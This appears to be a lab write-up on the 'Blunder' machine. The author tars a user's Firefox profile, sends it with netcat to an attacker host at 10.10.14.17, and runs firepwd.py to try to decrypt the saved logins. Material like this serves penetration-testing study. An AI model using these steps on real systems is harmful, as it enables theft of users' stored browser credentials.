InfoSec LAB

Firefox

hugo@blunder:~$ ll
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26  2020 ./
drwxr-xr-x  4 root root 4096 Apr 27  2020 ../
lrwxrwxrwx  1 root root    9 Apr 28  2020 .bash_history -> /dev/null
-rw-r--r--  1 hugo hugo  220 Nov 28  2019 .bash_logout
-rw-r--r--  1 hugo hugo 3771 Nov 28  2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27  2020 .cache/
drwx------ 11 hugo hugo 4096 Nov 28  2019 .config/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Desktop/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Documents/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Downloads/
drwx------  3 hugo hugo 4096 Apr 27  2020 .gnupg/
drwxrwxr-x  3 hugo hugo 4096 Nov 28  2019 .local/
drwx------  5 hugo hugo 4096 Apr 27  2020 .mozilla/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Music/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Pictures/
-rw-r--r--  1 hugo hugo  807 Nov 28  2019 .profile
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Public/
drwx------  2 hugo hugo 4096 Apr 27  2020 .ssh/
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Templates/
-r--------  1 hugo hugo   33 sep 18 05:34 user.txt
drwxr-xr-x  2 hugo hugo 4096 Nov 28  2019 Videos/

After making a lateral movement, I found out that the shaun user also has the .mozilla directory present in the home directory

shaun@blunder:~$ ll .mozilla
ll .mozilla
total 20K
4.0K drwxr-xr-x 16 shaun shaun 4.0K Jul  6  2021 ..
4.0K drwxr-xr-x  5 shaun shaun 4.0K Nov 28  2019 .
4.0K drwx------  2 shaun shaun 4.0K Nov 28  2019 extensions
4.0K drwx------  2 shaun shaun 4.0K Nov 28  2019 systemextensionsdev
4.0K drwxr-xr-x  7 shaun shaun 4.0K Nov 28  2019 firefox
shaun@blunder:~$ ll .mozilla/firefox
ll .mozilla/firefox
total 36K
4.0K drwx------ 13 shaun shaun 4.0K Jul  5  2021  ekbzf12k.default-release
4.0K drwx------  3 shaun shaun 4.0K May 19  2020 'Crash Reports'
4.0K drwxr-xr-x  5 shaun shaun 4.0K Nov 28  2019  ..
4.0K drwxr-xr-x  7 shaun shaun 4.0K Nov 28  2019  .
4.0K -rw-r--r--  1 shaun shaun   62 Nov 28  2019  installs.ini
4.0K -rw-r--r--  1 shaun shaun  259 Nov 28  2019  profiles.ini
4.0K drwx------  2 shaun shaun 4.0K Nov 28  2019  yoop1eyl.default
4.0K drwx------  2 shaun shaun 4.0K Nov 28  2019 'Pending Pings'
4.0K drwxr-xr-x  4 shaun shaun 4.0K Nov 28  2019  mhex3b0n.default-release

The user has a Firefox profile; ekbzf12k.default-release If the user has ever authenticated, I will be able to extract the credentials

shaun@blunder:~$ tar -czf firefox.tar.gz .mozilla/firefox 
 
shaun@blunder:~$ nc 10.10.14.17 2222 < firefox.tar.gz
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/shaun]
└─$ nnc 2222 > firefox.tar.gz                           
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 56112
 
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/shaun]
└─$ tar -xf firefox.tar.gz

Transfer complete

firepwd.py

┌──(kali㉿kali)-[~/…/htb/labs/blunder/firepwd]┌──(kali㉿kali)-[~/…/htb/labs/blunder/firepwd]
└─$ python3 firepwd.py -d shaun/.mozilla/firefox/ekbzf12k.default-release 
globalSalt: b'ef3b6c7f747609825ffe34d128a396f339bf506c'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.12.5.1.3 pbeWithSha1AndTripleDES-CBC
     SEQUENCE {
       OCTETSTRING b'928443fce73564e550c2b2e779c95569b2efadb7'
       INTEGER b'01'
     }
   }
   OCTETSTRING b'67ce08b7061abf780284ce3cdf7a5742'
 }
entrySalt: b'928443fce73564e550c2b2e779c95569b2efadb7'
b'70617373776f72642d636865636b0202'
password check? True
no saved login/password

firepwd.py was able to decrypt the encrypted string, but the result doesn’t appear to be “CLEARTEXT”; 70617373776f72642d636865636b0202

InfoSec LAB

Explorer

Blunder_Firefox_shaun

Firefox

firepwd.py

Interactive Graph View

Table of Contents

Backlinks